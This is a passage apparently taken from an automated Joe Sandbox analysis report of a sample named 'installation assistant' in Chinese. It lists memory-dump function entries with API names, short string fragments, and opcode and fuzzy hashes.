                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                            • Instruction ID: d570caf40e245b27e36250a7255f8c9fa1f86876e652b73dc5022b084e41082f
                                            • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                            • Instruction Fuzzy Hash: 35C116312047514BC328CE7DD1E4696BBE2AFDA314F14AA6CC8CE4BB56DA34A40DCB91
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 070d0fd322238de923fe1a2eebb0020640b7b085cfb472be6ac79834afb9933a
                                            • Instruction ID: 639b0f4757e589e36b0997a6ab7da05211813bede8e8ea99b27885fb878abefb
                                            • Opcode Fuzzy Hash: 070d0fd322238de923fe1a2eebb0020640b7b085cfb472be6ac79834afb9933a
                                            • Instruction Fuzzy Hash: 4FB170716052548FC390CF68C984254BBA2FF8522CB79AA9DC4588F646E336EC47CBD1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1abcbd09df316e1226b3bd6821a11b0a668bf7f1b83a95c986258978a9b95a2f
                                            • Instruction ID: 29b8dfccbbba2e70610ba315a789104b794033a7d7eea36f017e00d67af09415
                                            • Opcode Fuzzy Hash: 1abcbd09df316e1226b3bd6821a11b0a668bf7f1b83a95c986258978a9b95a2f
                                            • Instruction Fuzzy Hash: 06D1E7B1848B9A5FD394EF4DEC82A357762ABC8301F4A8239DB6007753D634BB12D794
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                            • Instruction ID: 74f719e53b64c4a796f7536352391412cae845c2d22be3c26b2e2629e2c19a36
                                            • Opcode Fuzzy Hash: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                            • Instruction Fuzzy Hash: 78B1BE31304B054BD324DA39CA98BEAB7E1AF85708F04493DC99B87781DF39A549C7D9
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                                            • Instruction ID: bed97a2906aad35ef13b70a849c73c3c238478efd9a160338e43c97aa60f9769
                                            • Opcode Fuzzy Hash: 7f5f8248f8a18455fd1713549b4a266ce9d34d374119e8c9520886de18fa66fd
                                            • Instruction Fuzzy Hash: 7A6161B23082258FD308CF99E284A96B7E5EBD9321B1695BFD109CB361E771DC41CB58
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 482053017e2a7efdb7bc9ab3d96018154e4c77c6c4b2041277a2a90eb64ac0e3
                                            • Instruction ID: baaa3ae1352e4fdd765ec12c07102c0bdbdd7b73c6d8ba3e1a9cc3f7a110e201
                                            • Opcode Fuzzy Hash: 482053017e2a7efdb7bc9ab3d96018154e4c77c6c4b2041277a2a90eb64ac0e3
                                            • Instruction Fuzzy Hash: 1881F2B2D447298BD710CF88ECC4596B3A1FB88308F0A467DDE591B352D2B9B915DBD0
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                                            • Instruction ID: 34a1521480cd6be24aff6e42dc9ebfb1078ec2a60e7b69e2a80e6f862adcab08
                                            • Opcode Fuzzy Hash: 1e144e3ab01ad0c1374fc479d6e69199773169d0809bfde8fbea9fa4d5497ab0
                                            • Instruction Fuzzy Hash: 54918F72C1871A8BD314DF18C88025AB7E0FB88308F094A7DED9AA7341D739EA55CBC5
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                            • Instruction ID: 408adf150d9ecb75469e686f2694712193be774346afa374df6cceebdad63364
                                            • Opcode Fuzzy Hash: e7510d37d1dc4b924ec4f7ba8427fb7a6be5c38a378ebc779dfd7017bf70bacd
                                            • Instruction Fuzzy Hash: DF51A072F006099BDB08CFA8DE926EDB7F1EB88304F25917AD015E7782D774AA41CB50
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                            • Instruction ID: 6f5ebfe2105259d630c98234a6c686e44071a9e09d08cf47e206733283192aa9
                                            • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                            • Instruction Fuzzy Hash: 323114277A440113C70CC92BCD1A79F91575BD422AB0ECF396805DAF55D52CD8134145
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                                            • Instruction ID: 018ba10f2035b0742615a3de56c03533152d3e128a6e2bd99b3a4d53a2710149
                                            • Opcode Fuzzy Hash: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                                            • Instruction Fuzzy Hash: 76312E735019260AF620859E8F903567123DFD1368F29BFE5D92D87EDCCBB59C0682C0
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                                            • Instruction ID: df001b1ddb46cc539762790db4233d42684528e4bb1e5ad92fbb7092f5ad9347
                                            • Opcode Fuzzy Hash: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                                            • Instruction Fuzzy Hash: B3419FB290471A8BD714CF19C89056AB3E4FF88318F454A6DED5AE7381E334FA25CB91
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                                            • Instruction ID: 3f9b3690cccd33bc9b27f6689f38b332b5eecee6c52f1213403aa936d95133b7
                                            • Opcode Fuzzy Hash: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                                            • Instruction Fuzzy Hash: 0A2178B1A047EB07F7208E2DCCC037577D29BC2305F494679DAA08FA87E1B984B2D660
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                                            • Instruction ID: d0ab9319250647c5b20cf31da3b4bed8d1d04f6b7ee4d04dae8365618a8828d9
                                            • Opcode Fuzzy Hash: 2f6c02fb19c880906673f7e2ee61692b55198f776a78d908325c4e40f91ba080
                                            • Instruction Fuzzy Hash: A02125B251443547C311DE2DE8C86B7B3E1FFC4319FA38A2AD9A28B581C624E455C6B0
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d76c5a5bc13364a97e7cc912041d9df0cf3f333301463df377c6d5e010c89ef9
                                            • Instruction ID: 1cad35cb912f41f165079bc2807a027056adb85a67608794e6cb4e25751e4215
                                            • Opcode Fuzzy Hash: d76c5a5bc13364a97e7cc912041d9df0cf3f333301463df377c6d5e010c89ef9
                                            • Instruction Fuzzy Hash: A22107326011188FC742EF6ADAC46EB73E6EFC4365FA7CA3DDD8147644C670E5068660
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                                            • Instruction ID: ff7122c004776fcf74636879530a3a623356374329c0c63db091e7fa27909b80
                                            • Opcode Fuzzy Hash: b8de0586c271a62662545cbcc3a7a3f305336ecaaee466a7150af84251bbb2fa
                                            • Instruction Fuzzy Hash: AA01817295462E57DB289F48CC41136B390FB85312F49863ADD479B385E734F970C6D4
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                            • API String ID: 3519838083-609671
                                            • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                            • Instruction ID: 870f9105d85923416d8a242fbc2b0d41036fc9e07ee46e5238e3783408e58b34
                                            • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                            • Instruction Fuzzy Hash: 0DD1A572A0420DDFCB11CFA4DA94FEEB7B5FF49308F244929E055A7A50DB709948CBA0
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: $ $$ K$, K$.$o
                                            • API String ID: 3519838083-1786814033
                                            • Opcode ID: 8aabfd49f75e4689d5c64928821ac6bb4626587af6c0d6ffd44deb225edb8441
                                            • Instruction ID: 18f2d0669586e31519e15df85468b6e8e9571ed3cee6e8ca29484424b9ebdeb7
                                            • Opcode Fuzzy Hash: 8aabfd49f75e4689d5c64928821ac6bb4626587af6c0d6ffd44deb225edb8441
                                            • Instruction Fuzzy Hash: 33D1F431F042598BCB21CFA8CE94BEEBBB1BF55308F244A6AC851BBA41C7715D44CB51
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: __aulldiv$H_prolog
                                            • String ID: >WJ$x$x
                                            • API String ID: 2300968129-3162267903
                                            • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                            • Instruction ID: 5c7bcf344604b06ef6b2591aa9ffe5264caac30aeb6807dd3800932150593b1e
                                            • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                            • Instruction Fuzzy Hash: 0A128B71900209EFCF10CFA8CA84ADDBBB1FF48318F25896DE915A7650D731AA45CF50
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: __aulldiv$__aullrem
                                            • String ID:
                                            • API String ID: 2022606265-0
                                            • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                            • Instruction ID: 95ac40527f94ec83c4f2aab60d68cb157225d96348ac7a03aef08276d33ea8cb
                                            • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                            • Instruction Fuzzy Hash: F521C83064121ABFDF608EA49E40DDF7A69FF417E8F20C635B511A1590D7724DA0E7A2
                                            APIs
                                            • __EH_prolog.LIBCMT ref: 6C7CA6F1
                                              • Part of subcall function 6C7D9173: __EH_prolog.LIBCMT ref: 6C7D9178
                                            • __EH_prolog.LIBCMT ref: 6C7CA8F9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: IJ$WIJ$J
                                            • API String ID: 3519838083-740443243
                                            • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                            • Instruction ID: 806e8a39feee3b16fe4e440ddc9b2c7d3d9798201a491879a7601fbfd20d63a5
                                            • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                            • Instruction Fuzzy Hash: 5C71B030A00256DFDF14DFA4C688BEDB7F0BF14318F1084A9D8556BB91CB75AA49CB91
                                            APIs
                                            • __EH_prolog.LIBCMT ref: 6C7DE41D
                                              • Part of subcall function 6C7DEE40: __EH_prolog.LIBCMT ref: 6C7DEE45
                                              • Part of subcall function 6C7DE8EB: __EH_prolog.LIBCMT ref: 6C7DE8F0
                                              • Part of subcall function 6C7DE593: __EH_prolog.LIBCMT ref: 6C7DE598
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: &qB$0aJ$A0$XqB
                                            • API String ID: 3519838083-1326096578
                                            • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                            • Instruction ID: 4c55e04a0a7fbaa15ecb2b24c09017779ae763f8c38b6222403452f8102733ad
                                            • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                            • Instruction Fuzzy Hash: 18218B71D01248AECB09DFE4DA8C9EDBBB4AF25318F204069E41277781DB781E0CCB51
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                             • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                             • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: J$0J$DJ$`J
                                            • API String ID: 3519838083-2453737217
                                            • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                            • Instruction ID: 4a5f0f6b891ef755e98115ab17ab19ac88a0c5390e6149e4fb74e08e73ac61d5
                                            • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                            • Instruction Fuzzy Hash: 4211CEB1900B64CEC720DF5AC55819AFBE4BFA5708B11CA1FC4A697B50C7F8A508CB99
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: $!$@
                                            • API String ID: 3519838083-2517134481
                                            • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                            • Instruction ID: 5b17bae89ae401272ca8fd59307f56fa1a8acae199d688111ed9a1d89472d3ca
                                            • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                            • Instruction Fuzzy Hash: 78126F70E0524ADFCF24CFA8CAD09DDBBB1BF05308F548869E845ABB51DB31A995CB50
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog__aulldiv
                                            • String ID: $SJ
                                            • API String ID: 4125985754-3948962906
                                            • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                            • Instruction ID: 4e4bbdb05a7f1a90dac013f7f20f9e83ffdcf4077ffccbaa8bb953e17338c7ae
                                            • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                            • Instruction Fuzzy Hash: 1EB13E71D0020A9FCB14CF99CA889AEBBB5FF48314F61853ED459A7B50D770AE46CB50
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: $CK$CK
                                            • API String ID: 3519838083-2957773085
                                            • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                            • Instruction ID: b12b1ff245c57d764fdb09bbf79aa50a2e980105c18108744b88b1fdeb343ac3
                                            • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                                            • Instruction Fuzzy Hash: 6A219270E412058BCB14DFE8CA841EEB7B2FB94314F558A2AC412E7B91C7747B068AA0
                                            APIs
                                            • __EH_prolog.LIBCMT ref: 6C7E4ECC
                                              • Part of subcall function 6C7CF58A: __EH_prolog.LIBCMT ref: 6C7CF58F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: H_prolog
                                            • String ID: :hJ$dJ$xJ
                                            • API String ID: 3519838083-2437443688
                                            • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                            • Instruction ID: c3176fa13edc9b6d764a99b240629d0a3ff567ab29222b6502deb9ad69644038
                                            • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                                            • Instruction Fuzzy Hash: F021DAB0801B40CFC760DF6AC14828ABBF4BF69718B40C96EC0AA97B11D7B8A508CF55
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C7B8000, based on PE: true
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmp
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: <J$DJ$HJ$TJ$]
                                            • API String ID: 0-686860805
                                            • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                                            • Instruction ID: c7b31ce033eca1264f6f992c32005efe326dd8ba7cc7afcf24be45fba7322475
